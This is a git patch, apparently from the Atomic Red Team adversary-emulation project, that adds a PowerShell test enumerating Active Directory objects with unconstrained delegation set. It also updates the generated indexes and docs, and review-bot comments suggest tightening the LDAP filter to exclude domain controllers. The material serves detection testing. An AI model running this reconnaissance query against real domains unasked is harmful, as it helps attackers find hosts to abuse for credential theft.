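Review bot: `get_prereq_command` runs `Add-WindowsCapability -Online` / `Install-WindowsFeature`, both of which need an elevated session, while the test declares `elevation_required: false`; if the framework runs the prerequisite step with the same elevation as the test, installing the RSAT module will fail for a standard user. Either state in the dependency description that the module must be installed from an elevated prompt or, if the harness supports it, mark the dependency itself as requiring elevation. The description also says the test "must run under a domain user", but `prereq_command` only checks that the module imports; adding `if (-not (Get-CimInstance Win32_ComputerSystem).PartOfDomain) { exit 1 }` would turn that requirement into a checked prerequisite rather than prose. Minor: `type: String` differs from the lowercase `type: string` used by T1027.yaml in this same series.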
@@ -175,6 +175,7 @@ atomic_tests: name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b description: | Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 361e31fb..409c774d 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -705,3 +705,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 +46f8dbe9-22a5-4770-8513-66119c5be63b From 6c81bb1b0ba902269223281b5e3642f807bb6052 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 16:51:26 +0000 Subject: [PATCH 9/9] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 43 ++++++++++++++ atomics/T1087.002/T1087.002.md | 57 +++++++++++++++++++ 6 files changed, 104 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8f816a2c..0e530577 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -620,6 +620,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 703da0de..5d54166f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -438,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d1a78b05..a9ae5a7c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1121,6 +1121,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d1f5864e..5b6382dc 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -820,6 +820,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7db65eb5..69c30c6a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -49429,6 +49429,49 @@ discovery: ' name: command_prompt + - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: 'PowerShell ActiveDirectory Module must be installed + +' + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' + -Server #{domain} + +' T1069.002: technique: external_references: diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 2b80197a..f39060c1 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain @@ -344,4 +346,59 @@ net user administrator /domain +
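Review bot: The executor's LDAP filter `(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})` matches every object class that carries the bit, but the description says the test queries for "computer objects"; user accounts with TRUSTED_FOR_DELEGATION set will be returned too, so either reword the description to "objects" or narrow the filter, e.g. `Get-ADObject -LDAPFilter '(&(objectCategory=computer)(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop}))' -Server #{domain}`. The description should also carry the caveat that domain controller computer accounts have this flag set by default, so with the default `uac_prop` the result set always contains the DCs; an operator hunting for abusable hosts would typically exclude them, for instance with `(!(primaryGroupID=516))` in the filter. Finally, `uac_prop` is declared `type: String` although its value is a numeric UAC bitmask (default `524288`); if the input schema allows it, `type: Integer` documents the expected value better. This note applies to the whole test definition added in this hunk; the same text is repeated in the generated T1087.002.md section below.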
+
+ +## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation +Attackers may attempt to query for computer objects with the UserAccountControl property +'TRUSTED_FOR_DELEGATION' (0x80000;524288) set +More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce +Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Domain FQDN | String | contoso.com| +| uac_prop | UAC Property to search | String | 524288| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: PowerShell ActiveDirectory Module must be installed +##### Check Prereq Commands: +```powershell +Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 +} +Catch { + exit 1 +} +``` +##### Get Prereq Commands: +```powershell +if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online +} else { + Install-WindowsFeature RSAT-AD-PowerShell +} +``` + + + +
